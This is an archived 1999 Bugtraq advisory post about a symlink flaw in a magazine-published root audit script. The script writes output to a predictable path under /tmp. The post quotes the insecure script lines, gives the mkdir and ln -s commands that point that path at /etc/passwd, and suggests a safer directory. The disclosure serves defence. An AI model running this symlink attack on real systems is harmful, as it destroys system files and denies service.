Bugtraq mailing list archives
January SysAdmin EY script DoS bug.
From: jkb () BEST COM (Jan B. Koum)
Date: Mon, 4 Jan 1999 02:33:46 -0800
/* Warning! Lame bug report ahead. */
/* This is nothing against EY. They are a good company. This
is against people who claim to be security experts and can't
write a secure script. */
Lets make it short. SysAdmin (www.samag.com - btw, their
DNS is brocken. Isn't it ironic that they can't get their
own systems running, yet they teach others how) magazine
published a script in Jan 1999 issue which, after you
run it as root, tells you stuff about your system. Here
are some parts of this script:
set HOSTNAME=`hostname`
set basedir=/tmp/eyscan
set OUTPUT=?{basedir}/ey-?{HOSTNAME}.out
After that, output like 'ls -l /etc/passwd' is sent to
$OUTFILE.
So you know that your admin runs lame scripts as root
and what do you do? Hmm.. gee..
% mkdir /tmp/eyscan
% ln -s /etc/passwd /tmp/eyscan/ey-`hostname`.out
After an admin runs the script - he is toasted. A points
to this story kids:
o set basedir=/root or /var/run ..
-- Yan
Current thread:
- Re: PATH variable in zip-slackware 2.0.35, (continued)
- Re: PATH variable in zip-slackware 2.0.35 Patrick J. Volkerding (Jan 04)
- Re: PATH variable in zip-slackware 2.0.35 bandregg () REDHAT COM (Jan 05)
- Re: PATH variable in zip-slackware 2.0.35 Karl Stevens (Jan 04)
- Re: PATH variable in zip-slackware 2.0.35 kay (Jan 02)
- Re: PATH variable in zip-slackware 2.0.35 Karl Stevens (Jan 05)
- Re: PATH variable in zip-slackware 2.0.35 kay (Jan 06)
- l0phtcrack 2.5 released The Forlorn (Jan 04)
- Re: SUN almost has a clue! (automountd) Casper Dik (Jan 05)
- Re: FreeBSD 2.2.5 Security problem Eivind Eklund (Jan 03)
- Re: FreeBSD 2.2.5 Security problem User NEAL (Jan 03)